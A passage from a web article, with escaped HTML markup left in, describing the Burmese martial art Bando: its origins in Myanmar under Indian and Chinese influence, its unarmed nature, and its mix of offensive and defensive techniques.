This \u201cself-defense\u201d based martial art form is said to have originated from Myanmar. Furthermore, this form of combat apart from comprising of \u201cdefensive\u201d moves also consists of \u201coffensive\u201d tactics that have been inspired by movements of animals. Apparently, many Buddhists from India and China migrated to Myanmar. It was because of this migration that the Burmese culture (which includes martial art forms) was heavily influenced by the presence of Indian and Chinese people Furthermore, it was thus using elements belonging to Indian and Chinese martial arts style that \u201cBando\u201d was actually created.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong> The weapon used in the Bando:<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Since this combat form is basically \u201cunarmed\u201d the weapon mainly used are the \u201chands and feet\u201d of the fighter.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong> The technique used in<\/strong> <strong>the Bando and training availability:<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">In terms of technique, the fighter in this form of combat encourages the use of both the \u201coffensive and defensive\u201d technique.
